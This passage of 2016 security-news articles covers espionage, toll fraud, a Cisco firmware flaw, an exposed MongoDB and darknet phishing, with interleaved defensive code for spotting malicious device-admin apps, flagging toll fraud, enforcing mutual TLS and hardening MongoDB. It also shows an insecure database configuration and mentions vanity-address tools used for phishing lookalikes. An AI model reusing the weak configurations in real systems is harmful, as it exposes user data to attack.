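    com.android.email/com.android.email.SecurityPolicy:
      uid=10035
      policies:
        limit-password
        wipe-data
    com.mms.messaging/com.mms.messaging.DeviceAdmin:
      uid=10099
      policies:
        force-lock
        wipe-data
        disable-keyguard-features
"""

# Device-admin policies that let an app lock, wipe or take over the device.
DANGEROUS_POLICIES = {"wipe-data", "force-lock", "reset-password",
                      "disable-keyguard-features"}


def parse_third_party_packages(text):
    """Set of package names from `pm list packages -3` output."""
    return {line.split(":", 1)[1].strip()
            for line in text.splitlines() if line.startswith("package:")}


def parse_device_admins(text):
    """Map package name -> set of policy names from `dumpsys device_policy`."""
    admins = {}
    current = None
    in_policies = False
    for line in text.splitlines():
        stripped = line.strip()
        # A component line looks like "pkg/pkg.ReceiverClass:".
        m = re.match(r"^([\w.]+)/[\w.$]+:$", stripped)
        if m:
            current = m.group(1)
            admins[current] = set()
            in_policies = False
            continue
        if current is None:
            continue
        if stripped == "policies:":
            in_policies = True
            continue
        if in_policies:
            if re.fullmatch(r"[a-z-]+", stripped):
                admins[current].add(stripped)
            else:
                in_policies = False   # left the indented policy block
    return admins


def find_suspicious_admins(pm_output, dumpsys_output):
    """Third-party packages that hold dangerous device-admin policies,
    as (package, sorted dangerous policies) pairs."""
    third_party = parse_third_party_packages(pm_output)
    admins = parse_device_admins(dumpsys_output)
    hits = []
    for pkg, policies in admins.items():
        dangerous = policies & DANGEROUS_POLICIES
        if pkg in third_party and dangerous:
            hits.append((pkg, sorted(dangerous)))
    return hits
```

System apps such as the stock email client legitimately hold wipe-data (for Exchange policies), which is why the script only reports packages that also appear in the third-party list. On a live device, `adb shell settings get secure install_non_market_apps` returning 1 means sideloading is enabled, the setting the fourth recommendation above tells users to turn off.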
Iranian hackers compromised former IDF chief’s computer
15.2.2016 Hacking
According to Israel’s Channel 10, Iranian hackers gained access last year to the computer of a retired Israeli army chief of staff.
Many reports published by security firms warn of the growing threat posed by Iranian hackers. US and Israeli organizations are a favoured target; last year the attackers used stolen private pictures of female IDF soldiers to breach an Israeli military server.
According to a report published by Israel’s Channel 10, hundreds of Israel’s current and former top security officials have been targeted by Iranian hackers.
The report reveals that Iranian hackers compromised the computers of 1,800 key figures worldwide, most of them in Israel, including a former Israeli Army chief of staff.
The report speculates that the hackers belong to Iran’s Revolutionary Guards. Experts at the Israeli security firm Check Point Software Technologies promptly identified and blocked the attacks.
The Israeli experts also identified one of the Iranian hackers, Yasser Balachi, who accidentally exposed his email ID. Check Point’s head of security services, Ron Davidson, confirmed that the man is a member of an organized group.
“Balachi said that he had not operated on his own initiative but for another cyber organization that commissioned the work,” said Ron Davidson.
It is still unclear what the actual extent of the damage was and what information was stolen.
Iranian hackers are becoming ever more aggressive. In November, computers of US State Department staff and other government employees were targeted by them. The experts linked the attackers to the Iranian Revolutionary Guard; according to investigators, the Facebook and e-mail accounts of US State Department officials focused on Iran were compromised to gather data about US-Iranian dual citizens in Iran and about the arrest of an Iranian-American businessman in Tehran in October.
The hackers took over social media accounts of junior State Department staff to launch a spear-phishing campaign against employees of the State Department’s Office of Iranian Affairs and Bureau of Near Eastern Affairs, as well as some journalists.
Check Point experts confirmed that the Iranian hackers launched spear phishing attacks against their targets with the intent to infect them with spyware.
In December, a report published by Symantec revealed that Iranian hackers have been using malware to track individuals, including Iranian activists and dissidents.
The researchers identified two groups of Iran-based hackers, dubbed Cadelle and Chafer, which have been distributing data-stealing malware since at least mid-2014. The experts uncovered the command-and-control servers and explained that registration details indicate the groups may have been operating since 2011.
There are a number of indicators that suggest both groups are based in Iran; the Cadelle and Chafer teams are most active during daytime in Iran’s time zone and primarily operate during Iran’s business week (Saturday through Thursday).
In June, experts at ClearSky spotted a number of cyber attacks launched from Iran and targeting Israeli organizations and other entities in the Middle East.
The ClearSky experts uncovered a cyber espionage campaign dubbed Thamar Reservoir, named after one of its targets, Thamar E. Gindin. The investigation dated the campaign back to 2011; the threat actors adopted several attack techniques aimed at espionage.
Most of the Thamar Reservoir victims (550) were located in the Middle East and belong to Middle Eastern and Iranian diplomatic entities, the defense and security industries, journalists and human rights organizations.
Who is behind the Thamar Reservoir campaign?
According to the researchers at ClearSky, the evidence collected suggest the involvement of Iranian hackers. The experts noticed several similarities with other attacks in the same geographic area such as:
Attacks conducted using the Gholee malware, which ClearSky discovered.
Attacks reported by Trend Micro in Operation Woolen-Goldfish.
Attacks conducted by the Ajax Security Team as documented by FireEye.
Attacks seen during Newscaster as documented by iSight.
No doubt Iranian hackers will continue to launch cyber espionage campaigns, likely with more advanced malware.
Man charged with laundering $19.6 million earned with PBX system hacking
15.2.2016 Hacking
Pakistani citizen Muhammad Sohail Qasmani admits laundering millions from a massive computer hacking and telecommunications fraud scheme.
A Pakistani citizen, Muhammad Sohail Qasmani (47), admitted laundering millions of dollars as part of a massive international computer hacking and telecommunications fraud scheme.
The man worked for a hacking crew that targeted US companies by breaking into their PBX systems.
The organization, composed of hackers in Bangkok and Pakistan, targeted American firms by identifying live phone extensions that were not assigned to any user; the operation was allegedly run by Noor Aziz, 53, from Karachi.
The hackers used these extensions to dial premium-rate lines they controlled; the gang reaped more than $50 million from its victims.
Qasmani laundered $19.6 million and transmitted money to roughly 650 individuals over four years; prosecutors maintain that the fraud scheme was highly professional and well organized.
He set up 650 bank accounts in ten different countries, which were used to collect the money generated by the fraudulent phone lines. He then forwarded the funds to the other members of the scheme, keeping his commission.
Qasmani was arrested by the FBI on December 22, 2014, when he entered the US. He faces a maximum sentence of 20 years in prison and a $250,000 fine.
“Thanks to the hard work of the prosecutors and agents on this case, Qasmani acknowledged his role in an international scheme that hijacked the telephone networks of US companies and ran up millions in bogus charges,” said the US Attorney Paul Fishman.
“Today, he admitted moving over $19 million in illicit proceeds across 10 countries and ensuring the dialers and hackers who perpetuated the scheme received their cut.” “The successful investigation of Qasmani is a testament to the dedication, hard work, and commitment of the men and women of the FBI, the Enforcement and Removal Operations of the U.S. Customs and Border Protection, and the State Department.”
Qasmani will be sentenced in May; Aziz is still at large and is on the FBI’s Most Wanted list.
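The scheme relied on two things that stand out in a PBX's call detail records (CDRs): calls originating from extensions nobody is assigned to, and calls to premium-rate destinations the business never dials. As an added example, not taken from the case or from any PBX vendor, here is a Python script that flags exactly those patterns, plus international calls placed outside business hours. The CDR lines, the extension directory and the blocked destination prefixes are all constructed for the example (the prefixes are arbitrary choices, not a claim about any country's numbering), and +1 is treated as domestic on the assumption of a US company.

```python
import csv
import io
from datetime import datetime

# Constructed sample CDR export (not from any real PBX): one call per line.
SAMPLE_CDR = """timestamp,src_ext,dst_number,duration_s
2014-06-14 02:13:05,2417,+2529901234567,1840
2014-06-14 02:14:10,2418,+2529901234567,1790
2014-06-14 09:30:00,1203,+12125551212,120
2014-06-14 23:55:41,2417,+3725551234,3600
2014-06-14 10:05:12,1108,+14155550101,45
"""

# Extensions actually assigned to users (constructed directory). Anything
# else that places a call is a live-but-unassigned extension.
ASSIGNED_EXTENSIONS = {"1108", "1203", "1250"}

# Destination prefixes the business never calls legitimately. The operator
# maintains this list; these two are arbitrary example values.
BLOCKED_PREFIXES = ("+252", "+372")

BUSINESS_HOURS = range(8, 19)   # 08:00 to 18:59 local time
DOMESTIC_PREFIX = "+1"          # assumption: a US company


def parse_cdr(text):
    """Parse a CSV CDR export into a list of dicts."""
    return list(csv.DictReader(io.StringIO(text)))


def classify_call(rec, assigned=ASSIGNED_EXTENSIONS,
                  blocked=BLOCKED_PREFIXES, business_hours=BUSINESS_HOURS):
    """Return the list of reasons a single call looks like toll fraud."""
    reasons = []
    if rec["src_ext"] not in assigned:
        reasons.append("unassigned-extension")
    if rec["dst_number"].startswith(blocked):
        reasons.append("blocked-destination")
    hour = datetime.strptime(rec["timestamp"], "%Y-%m-%d %H:%M:%S").hour
    international = (rec["dst_number"].startswith("+")
                     and not rec["dst_number"].startswith(DOMESTIC_PREFIX))
    if international and hour not in business_hours:
        reasons.append("after-hours-international")
    return reasons


def find_toll_fraud(text, **kwargs):
    """Alerts as (src_ext, dst_number, reasons) for every suspicious call."""
    alerts = []
    for rec in parse_cdr(text):
        reasons = classify_call(rec, **kwargs)
        if reasons:
            alerts.append((rec["src_ext"], rec["dst_number"], reasons))
    return alerts


def minutes_by_extension(text):
    """Total call minutes per source extension, useful for spotting an
    extension that suddenly carries hours of traffic overnight."""
    totals = {}
    for rec in parse_cdr(text):
        totals[rec["src_ext"]] = totals.get(rec["src_ext"], 0) + int(rec["duration_s"]) / 60
    return totals
```

Run against the sample, three of the five calls are flagged, all from the two unassigned extensions; the two daytime domestic calls from assigned users pass. The same three checks are what a carrier-side fraud desk looks for, and the cheapest mitigation is the one the attackers exploited the absence of: disable or restrict outbound dialling on every extension that has no owner.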
A flaw in Cisco Universal Small Cell allows firmware retrieval
15.2.2016 Vulnerebility
A flaw affecting Cisco Universal Small Cell devices allows unauthenticated remote users to retrieve the devices’ firmware; Cisco urges customers to patch.
More trouble for the IT giant Cisco: the company is asking service providers that use its Universal Small Cell solutions to update their systems and install a patch for a serious security issue.
The Cisco Universal Small Cell family is designed to help operators integrate 3G and 4G small-cell services into their infrastructure. The vulnerability could allow an unauthenticated remote attacker to download a copy of the devices’ firmware.
“A vulnerability in Cisco Universal Small Cell devices could allow an unauthenticated, remote attacker to retrieve firmware from a Cisco-hosted binary server.” states the Cisco’s advisory.
The advisory attributes the problem to the Cisco-hosted binary server not properly enforcing two-way (mutual) certificate validation, which means firmware retrieval is not restricted to genuine Universal Small Cell devices.
As a consequence, an attacker who has retrieved a valid key from the flash of a Universal Small Cell device can decrypt the binary images and read the information they contain, including the service provider configuration hints file, which holds sensitive information.
This information could then be used by a threat actor to attack the Universal Small Cell devices of a specific service provider.
“The vulnerability is due to insufficient enforcement of the two-way certificate validation process by the Cisco-hosted binary server to ensure that only Cisco Universal Small Cell devices are able to download the firmware images and service provider configuration hints file.” continues the advisory. “The hints file contains IP addresses of the device’s provisioned service provider Cisco Universal Small Cell RAN Management System. The binary images retrieved from the image distribution service could be decrypted by an attacker who has previously retrieved a valid key from the flash of a Cisco Universal Small Cell device.”
If your organization uses a Cisco Universal Small Cell solution, apply the patch as soon as possible.
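The root cause in the advisory is a server that did not enforce two-way (mutual) certificate validation. As an added example, not Cisco's code, here is that difference expressed as Python `ssl` server contexts: the weak setting (no client certificate required) beside the corrected one (CERT_REQUIRED plus a trusted CA), an audit helper that spots the weak setting, and a post-handshake check that the presented certificate names the expected device class. The CA bundle path and the organizationalUnitName value "Universal Small Cell" are assumptions made for the example.

```python
import ssl


def make_download_server_context(ca_bundle=None, require_client_cert=True):
    """TLS context for a firmware distribution server.

    ca_bundle: path to the CA that issued the devices' client certificates.
    None here because the example ships no files; a real deployment must
    load it, otherwise CERT_REQUIRED has nothing to validate against."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    if require_client_cert:
        # The corrected setting: the handshake fails unless the client
        # presents a certificate chaining to the loaded CA.
        ctx.verify_mode = ssl.CERT_REQUIRED
        if ca_bundle:
            ctx.load_verify_locations(cafile=ca_bundle)
    else:
        # The weak setting: the server authenticates itself to the client,
        # but any client at all may download.
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


def audit_context(ctx):
    """Findings for a server context; an empty list means it passes."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("client certificate not required")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("legacy TLS versions allowed")
    return findings


def client_is_authorized(peer_cert, allowed_ou="Universal Small Cell"):
    """Authorization after a successful mutual-TLS handshake.

    peer_cert is the dict SSLSocket.getpeercert() returns: its 'subject' is a
    tuple of RDNs, each a tuple of (attribute, value) pairs. A valid chain
    proves the CA issued the cert; this check additionally confirms the
    subject names the device class allowed to fetch firmware (assumed OU)."""
    if not peer_cert:
        return False
    subject = dict(pair for rdn in peer_cert.get("subject", ()) for pair in rdn)
    return subject.get("organizationalUnitName") == allowed_ou
```

In a server loop the context is used as `ctx.wrap_socket(conn, server_side=True)`, and `client_is_authorized(sock.getpeercert())` is evaluated before the image or hints file is sent. Note the advisory's second condition: the images are additionally encrypted, so mutual TLS is the control that keeps an attacker who already holds a device key from even obtaining ciphertext to decrypt.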
Recently another flaw, in Cisco ASA Software, alarmed the security industry: its exploitation could allow an unauthenticated, remote attacker to cause a reload of the affected system or to execute code remotely.
Misconfigured MongoDB allowed manipulation of a Microsoft’s career portal
15.2.2016 Safety
A security expert discovered a misconfigured MongoDB installation behind a Microsoft careers portal that exposed visitors to attacks.
Security researcher Chris Vickery has discovered yet another misconfigured MongoDB installation, this one backing a Microsoft careers portal. The database exposed user information and, because it was writable, allowed the content of the website to be altered.
The database also included information on other companies. It is maintained by Punchkick Interactive, a mobile development company hired by Microsoft to run m.careersatmicrosoft.com, and was promptly secured.
“Microsoft relies on Punchkick to handle the database that powers m.careersatmicrosoft.com. The bad news is that, for at least the past few weeks, this backend database has been exposed to the open internet and required no authentication at all to access.” Vickery wrote in a post published on the MacKeeper blog.
Vickery reported the issue to Microsoft on February 5. As proof of its severity he included a screenshot showing the name, email address, password hash and issued tokens for Microsoft’s Global Employment Brand Marketing Manager, Karrie Shepro. Punchkick fixed the issue within an hour.
“The good news is that as of February 5th, following my disclosure of the vulnerability to Punchkick and Microsoft, everything has been secured.”
The misconfigured database could have been exploited by hackers to inject malicious code into the web pages used for the job listings and mount watering-hole attacks.
“The ability to craft arbitrary HTML into an official Microsoft careers webpage is, to say the least, a powerful find for a would-be malicious hacker. This situation is the classic definition of a potential watering hole attack.” Vickery added.
An attacker could use exploit kits to compromise vulnerable visitors’ machines or run a phishing campaign against people looking for a job at Microsoft.
“In that scenario, any number of browser exploits could be launched against unsuspecting job-seekers. It would also be a fantastic phishing opportunity, as people seeking jobs at Microsoft probably tend to have higher value credentials,” Vickery added.
This incident demonstrates once again the importance of a proper security posture, including configuration and patch management, even when the service is operated by a third party.
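The root cause is a database reachable from the Internet with no authentication, which older MongoDB releases allowed out of the box unless configured otherwise. As an added example, not Punchkick's or Microsoft's configuration, here is the relevant part of a mongod.conf showing the exposed settings beside the corrected ones (the YAML format MongoDB 2.6 and later use).

```yaml
# Exposed configuration: what an instance like the one described looks like.
# It listens on every interface and authorization is off, so any client that
# can reach port 27017 can read and write every database.
net:
  port: 27017
  bindIp: 0.0.0.0
security:
  authorization: disabled
---
# Corrected configuration for the same server.
net:
  port: 27017
  bindIp: 127.0.0.1        # or the private address the application server uses
security:
  authorization: enabled   # every client must authenticate
# Create an administrative user before turning authorization on, from the
# mongo shell:  use admin; db.createUser({user: "admin",
#   pwd: "<strong password>", roles: ["userAdminAnyDatabase"]})
```

After the change, the quick external check is the one Vickery would have run: `mongo --host <public-ip> --eval 'db.adminCommand("listDatabases")'` from outside the network should now fail to connect or be refused for lack of credentials rather than return the database list. Binding to localhost and a firewall rule are the controls that hold even if a later configuration change turns authorization off again.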
Stolen card data of 100,000 Britons for sale on the clear web
15.2.2016 Incindent
A website on the clear web is offering for sale stolen card data from more than a million people worldwide including more than 100,000 Britons.
According to a report published by The Times, the website Bestvalid.cc is offering for sale stolen credit and debit card details of 100,000 Britons.
Card details stolen from more than a million people worldwide sell for as little as £1.67; the victims include a former senior adviser to the Queen, bankers, doctors and lawyers.
The site has been available on the surface web since at least June, and the journalists are surprised that law enforcement has not yet seized it.
“The National Crime Agency must act immediately to get this site closed. I will be writing to the NCA to bring this issue to their attention,” said Keith Vaz, chairman of the home affairs select committee.
Politicians are urging police intervention; such marketplaces could be used by organized crime and radical groups to fund terrorism and other illegal activities.
Like many black markets hosted on the dark web, Bestvalid.cc looks like an ordinary e-commerce site, complete with customer service and refunds for faulty products.
Users can buy stolen payment card data, often bundled with further information (e.g. answers to common online banking security questions, the cardholder’s postal address) that could be used for more sophisticated scams.
A Times journalist bought a batch of data that included the details of a person he was able to contact. He paid in Bitcoin, of course, and received a package containing the debit card number, security code, expiry date, mobile phone number and postal address.
When the journalist showed the data to the victim, Laia Humbert-Vidan, 30, a radiotherapy physicist from London, she was disconcerted.
“I don’t feel like the police are able to protect anyone from online fraud. If they were, these types of sites would not exist in the first place.” said Laia Humbert-Vidan.
In recent months the underground market has been flooded with data from major breaches, including those at TalkTalk and Carphone Warehouse.
Bestvalid is not hidden on the dark web; it is easy to reach and is one of the biggest websites offering stolen card data.
Cybercrime has a significant impact on every national economy; it is estimated to cost the UK £27 billion a year, and the Centre for Economics and Business Research puts the cost to UK businesses alone at £34 billion a year.
Police Arrest 16-year-old Boy Who Hacked CIA Director
13.2.2016 Crime
The teenage hacker who calls himself a member of the hacktivist group "Cracka with Attitude," behind a series of hacks on the United States government and its high-level officials, including the CIA director, may finally have been arrested.
In a joint effort, the Federal Bureau of Investigation (FBI) and British police have reportedly arrested a 16-year-old British teenager who they believe allegedly:
Leaked the personal details of tens of thousands of FBI agents and US Department of Homeland Security (DHS) employees.
Hacked into the AOL emails of CIA director John Brennan.
Hacked into the personal email and phone accounts of the US spy chief James Clapper.
Broke into the AOL emails of the FBI Deputy Director Mark Giuliano.
Federal officials haven't yet released the identity of the arrested teenager, but the boy is suspected of being the lead hacker of Cracka With Attitude, who calls himself Cracka, the South East Regional Organised Crime Unit (SEROCU) told the Daily Dot.
According to the report, Cracka is the same teenage hacker who recently leaked the personal information of around 31,000 government employees: nearly 20,000 FBI agents, 9,000 Department of Homeland Security (DHS) officers and a number of DoJ staffers.
Crime Unit Released a Statement
In a statement, the SEROCU confirmed that the unit had arrested a teenager on Tuesday in the East Midlands on suspicion of:
Conspiracy to commit unauthorised access to computer material contrary to Section 1 Computer Misuse Act 1990.
Conspiracy to commit unauthorised access with intent to commit further offences contrary to Section 2 Computer Misuse Act 1990.
Conspiracy to commit unauthorised acts with intent to impair or with recklessness as to the impairing operation of a computer contrary to Section 3 Computer Misuse Act 1990.
Accused Teen: Authorities Ruining My Life
The unit declined to provide any further information on the arrest, but while speaking to Motherboard, the arrested teenager denied being Cracka, saying "I am not who you think I am ;) ;) ;)"
"I am innocent until proven guilty so I have nothing to be worried about," the teen said. "They are trying to ruin my life."
Neither the Department of Justice (DoJ) nor the FBI has yet responded to requests for comment.
Nasdaq to Use Bitcoin-style Blockchain to Record Shareholder Votes
13.2.2016 IT
The Nasdaq stock exchange and the Republic of Estonia have announced the use of Blockchain-based technology to allow shareholders of companies to e-vote in shareholder meetings even when they're abroad, according to Nasdaq's press release.
The global stock market giant is developing an electronic shareholder voting system built on top of the blockchain technology that underpins Bitcoin.
Blockchain, the public and decentralized ledger technology that underpins all Bitcoin transactions, logs each transfer of an asset in a cryptographically hashed "block" that is appended to a permanent, transparent chain showing every transaction associated with that asset.
Even some of the world's major banks are also considering the adoption of the Blockchain technology.
In the middle of last year, nine of the world's major banks, including JPMorgan, Royal Bank of Scotland, Goldman Sachs and Barclays, partnered with the New York-based financial technology firm R3 to create a new blockchain-based framework.
According to Nasdaq, shareholders of the companies listed on the Nasdaq OMX Tallinn Stock Exchange and other Estonian e-residents, called "e-Estonians", will now be able to participate in voting more frequently without being physically present at a shareholder meeting.
Here's Why Blockchain Technology:
Estonia offers e-Residency, a transnational digital identity available to people who want to run a business online in the country.
But if these individuals own stock in an Estonian publicly listed company, they must be physically present at shareholder meetings or nominate a proxy to vote on their behalf, which is a cumbersome process.
With the blockchain system, a user is issued a private key (a unique, long number) tied to their entry in the e-Residency records held by the Estonian government.
This record is then sealed on the blockchain, where it cannot be altered or tampered with. The private key is then required to prove your identity whenever you vote online in a shareholder meeting.
This allows companies and e-Estonians to be sure that the person voting online is who they claim to be.
This is not Nasdaq's first blockchain deployment: it already runs its own blockchain system, Nasdaq Linq, which handles private securities issuance between an investor and a company.
Nasdaq hopes to complete this blockchain project sometime in 2016.
Here's How to Decrypt Hydracrypt & Umbrecrypt Ransomware Files
13.2.2016 Virus
Over the last few years we have seen several ransomware families that demand large sums of money from users to restore their encrypted files.
We have also seen decryption tools released for some of them, such as Cryptolocker (partial), Coinvault and Rescue Kit.
One more decryption tool has recently been released, for the newly emerging ransomware families HydraCrypt and UmbreCrypt, which are distributed through the Angler Exploit Kit.
Both belong to the CrypBoss ransomware family.
The source code of CrypBoss was leaked on Pastebin last year and was later analyzed by Fabian Wosar, a security researcher at Emsisoft.
Using the CrypBoss source code, Wosar was able to break the ransomware's encryption scheme and quickly built a decryption tool for CrypBoss and its variants, HydraCrypt and UmbreCrypt.
Both HydraCrypt and UmbreCrypt trace back to CrypBoss, with only small changes to the implementation made by their authors.
"Unfortunately the changes made by the HydraCrypt and UmbreCrypt authors cause up to 15 bytes at the end of the file to be damaged irrecoverably" Wosar stated.
In most cases the damaged bytes are not critical, since they are typically padding or trailing data, and for formats where they matter the last 15 bytes can often be rebuilt with a file repair tool.
This has little effect on the overall recovery: 99 percent of files come back intact using the released decryptor, which is free to download.
How to Decrypt Ransomware Files?
Double-clicking the decryptor executable starts the key recovery, and the key is displayed once it completes. The time needed depends on your system's processing power.
Once the key has been recovered, write it down on paper. Then run the decryptor, select the folders to be decrypted and enter the key when prompted.
To avoid a mess, users are advised to:
Run the decryptor on a small number of files first, to check that decryption is working properly.
This confirms the files are being recovered correctly and saves time.
Make sure there is enough free disk space for the decrypted files.
How to Ensure your Decrypted Data is Legit?
Emsisoft also warns that the decryption result may not be correct, because the ransomware does not leave any information about the original file behind.
To verify recovery, first pick an encrypted file for which you still have the original (from a backup or a cloud copy) and drag-and-drop both onto the decryptor executable.
[Note: if no such pair is available, you can use a random encrypted file together with a random PNG image downloaded from the Internet.]
If the result is correct, you can proceed with the remaining files; since they were all encrypted with the same key and algorithm, they should all decrypt normally.
BlackEnergy infected also Ukrainian Mining and Railway Systems
13.2.2016 APT
Experts at Trend Micro discovered strains of BlackEnergy malware involved in the recent attacks against Ukrainian Mining and Railway Systems.
BlackEnergy was in the headlines when the security industry examined the power outage that occurred in Ukraine in December 2015.
BlackEnergy is malware that has evolved to target SCADA systems; its latest variant includes the KillDisk component, developed to wipe disks and render systems inoperable.
The Ukrainian government accused Russia of being involved in the attack that caused the power outages, but further analysis revealed that the BlackEnergy malware was not directly responsible for the outages.
Now Trend Micro has announced that it spotted BlackEnergy and KillDisk samples on the systems of a Ukrainian mining company and a major railway operator.
The experts noticed that the systems at the mining company were also infected with multiple variants of KillDisk; these samples implement the same features observed in the KillDisk component that infected the power utilities in Ukraine.
The security researchers believe that the threat actor behind them is the same one that targeted the Ukrainian power companies.
The researchers noticed many similarities between the samples, naming conventions, control infrastructure, and the timing of the attacks.
Trend Micro spotted several samples similar to the BlackEnergy variant that infected the Ukrainian power utility; the malware used the same command and control (C&C) servers.
“Like the attacks against the Ukrainian mining company, we also witnessed KillDisk possibly being used against a large Ukrainian railway company that is part of the national Ukrainian railway system. The file tsk.exe (SHA1: f3e41eb94c4d72a98cd743bbb02d248f510ad925) was flagged as KillDisk and used in the electric utility attack as well as against the rail company. This appears to be the only spillover from the Ukrainian power utility infection. However, we have no proof showing that BlackEnergy was present on the railway systems, it could be assumed that it was likely present somewhere in their network.” states a blog post published by Trend Micro.
The experts put forward several theories about the attack; one of the most plausible is a politically motivated, persistent attacker striking Ukrainian critical infrastructure to destabilize the country.
“One is that the attackers may have wanted to destabilize Ukraine through a massive or persistent disruption involving power, mining, and transportation facilities,” Wilhoit said. “Another possibility is that they have deployed the malware to different critical infrastructure systems to determine which one is the easiest to infiltrate and subsequently wrestle control over. A related theory is that the infections in the mining and train companies may have just been preliminary infections, where the attackers are just attempting to test the code base.”
Whatever the case, cyber attacks against critical infrastructure are a serious threat to any government.
Microsoft Edge's InPrivate Mode Finally Keeps Your Activity Private
12.2.2016 Safety
Browsing the Web in 'Private Mode' is not as private as you think.
Microsoft has patched the private-browsing leakage bug in its Edge browser with the latest update.
When we talk about browsers, the one that rarely comes to mind is Internet Explorer (IE).
There was even a running joke on social media that IE is "the best web browser for downloading other browsers."
The joke had a point: on a freshly installed operating system, most people used IE only to download another browser.
Amid the continual taunts, Microsoft replaced IE with a new browser called Edge (codenamed "Spartan").
Edge shipped as the default browser (alongside IE) on Windows 10 devices and attracted plenty of attention, as it included the features other mainstream browsers have.
Well, History Repeats Itself
In January this year, it was reported that the 'InPrivate' mode of the Edge browser was leaking users' web browsing data.
InPrivate is Edge's equivalent of Chrome's Incognito mode. It was found to be storing browsing history, cookies and cache in a WebCache file on the system, which is easy to locate.
Precisely here:
\Users\user_name\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
This issue drove users away again, back to browsers like Firefox or Chrome, whose private browsing modes behave as expected.
The reported issue was fixed in update KB3135174.
The update's release notes list it as "Fixed issue with Microsoft Edge browser caching visited URLs while using InPrivate browsing."
Microsoft: Windows 10, Edge So Secure They Don't Need EMET
In a separate statement, Microsoft claimed that Edge is much more secure than other browsers and no longer needs the protection of a tool like EMET.
The Enhanced Mitigation Experience Toolkit (EMET) is a Windows tool that makes it harder to exploit software vulnerabilities on Windows.
For now, Microsoft has closed one hole; we will see what else turns up in the same family.
New York Police Used Cell Phone Spying Tool Over 1000 Times Without Warrant
12.2.2016 Mobil
The New York Police Department (NYPD) has admitted that it used controversial cell phone spying tool "Stingrays" more than 1,000 times since 2008 without warrants.
In the documents obtained by the New York Civil Liberties Union (NYCLU), the NYPD acknowledged that the department has used Stingrays to intercept personal communications and track the locations of nearby mobile phone users.
What are Stingrays?
In my previous article, I explained the scope of Stingrays along with how they work, how they crack encryption and how police agencies use these cell phone spying devices, equipped in the military surveillance technology DRTBox, in order to:
Track people
Intercept thousands of cellphone calls
Quietly eavesdrop on conversations
Eavesdrop on emails and text messages
Stingrays are small cell phone surveillance devices that work by imitating cellphone towers, forcing all nearby phones to connect to them and revealing the owners' locations. These devices are small enough to be mounted on a plane.
The organization disclosed on Thursday that the NYPD did not obtain a proper warrant before using the cell phone spying device, instead obtaining a "pen register order" from a lower-level court, an order typically used to collect phone call data for a specific mobile phone.
Moreover, the NYPD has no written policy guidelines for Stingray use. According to the NYCLU, this is the first time the nation's largest police agency has confirmed using the controversial surveillance technology.
NY Police Used Stingrays 1,016 Times
While Stingrays were most commonly used for serious investigations – like kidnapping, drug trafficking, rape, homicide, assault – the NYPD was also using these devices to investigate money laundering and ID theft.
The police records show that the department used Stingrays 1,016 times between 2008 and May 2015, which indicates that the police have been relying heavily on Stingray surveillance and violating the privacy of New Yorkers.
"If carrying a cell phone means being exposed to military-grade surveillance equipment, then the privacy of nearly all New Yorkers is at risk," NYCLU executive director Donna Lieberman says.
"Considering the NYPD's troubling history of surveilling innocent people, it must at the very least establish strict privacy policies and obtain warrants [before] using intrusive equipment like Stingrays that can track people's cell phones."
Warrantless Surveillance
Last year, both the Department of Justice (DoJ) and the Department of Homeland Security (DHS) announced a policy that required the FBI and other federal authorities to obtain a proper court warrant before deploying these tracking devices.
Moreover, some states, including California, also passed a law that requires a court warrant for the use of Stingrays, DirtBoxes and similar tracking devices.
Still, these notorious spying devices continue to be used without warrants and without the knowledge of citizens. The NYCLU suggests that the department change its policy, "at a minimum", to require officers to obtain a warrant before deploying such devices.
In response to this report, however, the NYPD justified itself by saying that it used the surveillance technology in emergency situations in which someone's life or safety was at risk, and only after applying for a court order and consulting a District Attorney.
A replica of AlphaBay market used to steal login credentials
12.2.2016 Incindent
Fraudsters operating on the AlphaBay darknet market have deployed a replica of the popular marketplace to steal login credentials from peers.
Paul Mutton, a security expert at Netcraft, discovered a fake version of the AlphaBay Market (pwoah7foa6au2pul.onion), one of the most popular black markets hosted on the dark web.
Paul Mutton speculates that fraudsters have deployed the fake version of the Alphabay Market in an attempt to steal login credentials.
“Fraudsters operating on the AlphaBay darknet market are using phishing attacks to steal login credentials from other criminals. In this particular attack, the phishing site mimics the address of one of AlphaBay’s Tor hidden services.” wrote Mutton.
AlphaBay is today one of the most interesting black markets; it offers any kind of illegal product and service. It emerged in 2014 following the seizure of Silk Road, it was founded by members of a Russian carding forum, and today it is the most important black market for payment card fraud.
The fake website mimics the login page of the Alphabay black market, including the CAPTCHA protection mechanism.
When AlphaBay users log in to the bogus website, they are redirected to the legitimate AlphaBay Market.
To replicate the legitimate website, it would also be necessary to reproduce the .onion address associated with the hidden service. This address is derived from the public key used to authenticate the connection, which means it is very difficult to convincingly impersonate the site without access to the owner's key pair.
Fraudsters could compute a partial match using tools such as scallion and generate a similar address like pwoah7f5ivq74fmp.onion.
“However, in the case of this phishing attack, the fraudster has simply created a lookalike domain on the public internet, using the address pwoah7foa6au2pul.me.pn.” wrote Mutton.
“This phishing attack makes use of a me.pn domain, which was likely chosen because addresses under this domain can be registered for free, and the “.me.pn” string bears a (somewhat tenuous) similarity to the .onion TLD, at least in terms of its length.”
As explained by Mutton, this phishing attack is another example of fraudsters defrauding fraudsters.
Obviously, similar attacks represent a threat only to new users deceived by the replica, while AlphaBay veterans will never fall victim to such an attack.
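The derivation described above, as an added example that is not part of the original article or of Netcraft's code: a 2016-era (v2) .onion address is base32 of the first 80 bits of SHA-1 over the DER-encoded RSA public key, and the check that defeats a lookalike is to compare the whole address, not its prefix. The modulus below is a constructed toy value, not a real key.

```python
import base64
import hashlib
from typing import Tuple

# Toy 1024-bit modulus, constructed for the demo: it only needs to be an
# integer to hash, not a real RSA key. 65537 is the usual RSA exponent.
TOY_MODULUS = (1 << 1023) | 0x10001
TOY_EXPONENT = 65537


def _der_len(n: int) -> bytes:
    """DER length octets (short form below 128, long form above)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der_int(value: int) -> bytes:
    """DER INTEGER: minimal big-endian, with a 0x00 pad if the top bit is set."""
    body = value.to_bytes((value.bit_length() + 7) // 8 or 1, "big")
    if body[0] & 0x80:
        body = b"\x00" + body
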